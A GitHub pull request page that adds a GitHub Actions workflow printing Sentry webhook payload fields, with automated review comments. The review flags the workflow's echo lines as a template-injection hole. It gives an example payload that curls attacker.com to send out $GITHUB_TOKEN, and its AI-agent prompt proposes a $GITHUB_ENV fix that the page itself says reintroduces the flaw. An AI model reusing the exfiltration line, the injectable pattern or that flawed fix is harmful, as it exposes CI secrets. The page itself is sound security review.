[Common] sentry dispatch test #1274

Merged
dooohun merged 1 commit into develop from chore/sentry-dispatch-test on Jun 8, 2026

Conversation

@dooohun dooohun commented Jun 8, 2026
Contributor

What is this PR? 🔍

  • Feature: sentry dispatch test

Changes 📝

  • Add a test workflow to confirm that GitHub Actions actually runs when the Sentry Webhook Receiver calls repository_dispatch
  • Print the client_payload fields when an event of type sentry-error is received

ScreenShot 📷

N/A

Precaution

A receiver server for the webhook requests has been added

✔️ Please check if the PR fulfills these requirements

  • It is submitted to the correct branch, not unconditionally to the develop branch?
  • If on a hotfix branch, ensure it targets main?
  • There are no warning messages when you run yarn lint

Summary by CodeRabbit

Release notes

  • Chores
    • Added an automated workflow for handling Sentry error events

@dooohun dooohun self-assigned this Jun 8, 2026
@dooohun dooohun added the ✅ Test (Test related) label Jun 8, 2026
coderabbitai Bot commented Jun 8, 2026

Walkthrough

Adds a GitHub Actions workflow that responds to the sentry-error type of the repository_dispatch event. It checks the main fields of the Sentry payload by printing them to standard output.

Changes

Sentry dispatch test workflow

Layer / File | Description
Sentry dispatch test workflow
.github/workflows/sentry-dispatch-test.yml | Configures the workflow to receive the repository_dispatch event type sentry-error and run on an ubuntu-latest runner, and prints the issue_id, title, sentry_url, environment, level, and project fields of the Sentry payload.

Estimated code review effort

🎯 1 (Simple) | ⏱️ ~5 min

Suggested labels

⚙ Setting

Suggested reviewers

  • ParkSungju01
  • JeongWon-CHO
  • dh2906

🚥 Pre-merge checks | ✅ 5
✅ Passed checks (5 passed)

Check name | Status | Explanation
Description Check | ✅ Passed | Check skipped - CodeRabbit's high-level summary is enabled.
Title check | ✅ Passed | The title clearly summarizes the main change in the pull request and accurately reflects the core change, the addition of a Sentry dispatch test workflow.
Docstring Coverage | ✅ Passed | No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.
Linked Issues check | ✅ Passed | Check skipped because no linked issues were found for this pull request.
Out of Scope Changes check | ✅ Passed | Check skipped because no linked issues were found for this pull request.


@github-actions github-actions Bot requested review from ParkSungju01 and ff1451 June 8, 2026 14:40

@coderabbitai coderabbitai Bot left a comment


Actionable comments posted: 1

🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

Inline comments:
In @.github/workflows/sentry-dispatch-test.yml:
- Around line 14-19: The echo lines directly expand github.event.client_payload
fields into the shell, allowing command injection; instead set those values into
GitHub Actions environment variables (e.g. write ISSUE_ID, TITLE, SENTRY_URL,
ENVIRONMENT, LEVEL, PROJECT into $GITHUB_ENV using lines like echo "ISSUE_ID=${{
github.event.client_payload.issue_id }}" >> $GITHUB_ENV) and then reference the
safe env vars in subsequent run steps (e.g. echo "Issue ID: $ISSUE_ID"),
replacing the direct uses of ${{ github.event.client_payload.title }}, ${{
github.event.client_payload.sentry_url }}, ${{
github.event.client_payload.environment }}, ${{
github.event.client_payload.level }}, and ${{
github.event.client_payload.project }}.

ℹ️ Review info
⚙️ Run configuration

Configuration used: Path: .coderabbit.yaml

Review profile: CHILL

Plan: Pro

Run ID: 3b32a9b1-94ea-4ed0-bb0a-914340ab2d5d

📥 Commits

Reviewing files that changed from the base of the PR and between 786fd96 and b3ea9e8.

📒 Files selected for processing (1)
  • .github/workflows/sentry-dispatch-test.yml

Comment on lines +14 to +19
echo "Issue ID: ${{ github.event.client_payload.issue_id }}"
echo "Title: ${{ github.event.client_payload.title }}"
echo "Sentry URL: ${{ github.event.client_payload.sentry_url }}"
echo "Environment: ${{ github.event.client_payload.environment }}"
echo "Level: ${{ github.event.client_payload.level }}"
echo "Project: ${{ github.event.client_payload.project }}"


⚠️ Potential issue | 🔴 Critical | ⚡ Quick win

Template injection vulnerability: do not expand client_payload directly into shell commands.

Expanding client_payload values sent by the external webhook receiver directly into shell commands (${{ }}) is vulnerable to command injection. If a malicious payload contains shell metacharacters (;, $(), `, and so on), arbitrary code can be executed.

For example, if the title field contains a value such as "; curl http://attacker.com?token=$GITHUB_TOKEN; echo ", sensitive information could be leaked or the CI environment could be compromised.

🔒 Recommended fix: pass the values safely through environment variables
     steps:
       - name: Print Sentry payload
+        env:
+          ISSUE_ID: ${{ github.event.client_payload.issue_id }}
+          TITLE: ${{ github.event.client_payload.title }}
+          SENTRY_URL: ${{ github.event.client_payload.sentry_url }}
+          ENVIRONMENT: ${{ github.event.client_payload.environment }}
+          LEVEL: ${{ github.event.client_payload.level }}
+          PROJECT: ${{ github.event.client_payload.project }}
         run: |
-          echo "Issue ID: ${{ github.event.client_payload.issue_id }}"
-          echo "Title: ${{ github.event.client_payload.title }}"
-          echo "Sentry URL: ${{ github.event.client_payload.sentry_url }}"
-          echo "Environment: ${{ github.event.client_payload.environment }}"
-          echo "Level: ${{ github.event.client_payload.level }}"
-          echo "Project: ${{ github.event.client_payload.project }}"
+          echo "Issue ID: $ISSUE_ID"
+          echo "Title: $TITLE"
+          echo "Sentry URL: $SENTRY_URL"
+          echo "Environment: $ENVIRONMENT"
+          echo "Level: $LEVEL"
+          echo "Project: $PROJECT"
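Review bot: the `env:` mapping in this hunk is the right fix, but the AI-agent prompt posted with this review recommends a different one (`echo "ISSUE_ID=${{ github.event.client_payload.issue_id }}" >> $GITHUB_ENV`) that keeps the `${{ }}` expansion inside a shell command and therefore reintroduces the same template injection, and a newline in the value would additionally let the payload append arbitrary entries to GITHUB_ENV. Keep the `env:` form shown here, keep the variables double-quoted in `run:` as the hunk does, and do not apply the `$GITHUB_ENV` variant.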

When the values are set as environment variables, GitHub Actions handles the escaping automatically, so injection attacks can be prevented.

🧰 Tools
🪛 zizmor (1.25.2)

[error] 14-14: code injection via template expansion (template-injection): may expand into attacker-controllable code
(template-injection)
[error] 15-15: code injection via template expansion (template-injection): may expand into attacker-controllable code
(template-injection)
[error] 16-16: code injection via template expansion (template-injection): may expand into attacker-controllable code
(template-injection)
[error] 17-17: code injection via template expansion (template-injection): may expand into attacker-controllable code
(template-injection)
[error] 18-18: code injection via template expansion (template-injection): may expand into attacker-controllable code
(template-injection)
[error] 19-19: code injection via template expansion (template-injection): may expand into attacker-controllable code
(template-injection)


Source: Linters/SAST tools
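As an added example (not code from this PR or its repository), a small Python checker that flags the pattern zizmor reported here: a `${{ }}` expression from an untrusted context such as `github.event.client_payload` landing inside a `run:` script, while the same expression under `env:` is left alone because the shell never parses it. The two embedded snippets are constructed, modelled on the step this PR adds and on the `env:` fix from the review; `UNTRUSTED`, `RUN_KEY` and `find_run_template_injection` are this example's own names.

```python
import re
# Constructed samples (not the repository's file): the step as this PR adds
# it, and the same step rewritten with the env: mapping suggested in review.
VULNERABLE_STEP = """\
    steps:
      - name: Print Sentry payload
        run: |
          echo "Issue ID: ${{ github.event.client_payload.issue_id }}"
          echo "Title: ${{ github.event.client_payload.title }}"
"""
FIXED_STEP = """\
    steps:
      - name: Print Sentry payload
        env:
          ISSUE_ID: ${{ github.event.client_payload.issue_id }}
          TITLE: ${{ github.event.client_payload.title }}
        run: |
          echo "Issue ID: $ISSUE_ID"
          echo "Title: $TITLE"
"""

EXPR = re.compile(r"\$\{\{\s*(.*?)\s*\}\}")
# Expression contexts an outside party can shape (hypothetical list, not
# exhaustive); client_payload comes straight from the webhook receiver.
UNTRUSTED = ("github.event.client_payload", "github.event.issue",
             "github.event.pull_request", "github.event.comment",
             "github.head_ref", "inputs.")
RUN_KEY = re.compile(r"^(?:-\s+)?run:\s*([|>][-+]?)?\s*(.*)$")

def find_run_template_injection(workflow_text):
    """Return (line_number, expression) for each untrusted ${{ }} expansion
    that lands inside a run: script, i.e. inside a shell command line."""
    findings = []
    run_indent = None  # indent of the open "run: |" key, or None
    for lineno, line in enumerate(workflow_text.splitlines(), 1):
        stripped = line.lstrip()
        indent = len(line) - len(stripped)
        if run_indent is not None and stripped and indent <= run_indent:
            run_indent = None            # block scalar ended; re-examine line
        if run_indent is not None:
            body = stripped              # one line of the run: script
        else:
            m = RUN_KEY.match(stripped)
            if not m:
                continue                 # env:, name:, with: ... are not shell
            if m.group(1):
                run_indent = indent      # "run: |" -> body follows below
            body = m.group(2)            # inline "run: echo ..." form
        for e in EXPR.finditer(body):
            if e.group(1).startswith(UNTRUSTED):
                findings.append((lineno, e.group(1)))
    return findings
```

Running it over the two snippets reports lines 4 and 5 of the vulnerable step and nothing for the fixed one, matching the two zizmor findings this PR received for its first two echo lines.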

@ff1451 ff1451 left a comment

Contributor

👍

@dooohun dooohun merged commit b25328a into develop Jun 8, 2026
4 of 5 checks passed
@dooohun dooohun deleted the chore/sentry-dispatch-test branch June 8, 2026 14:47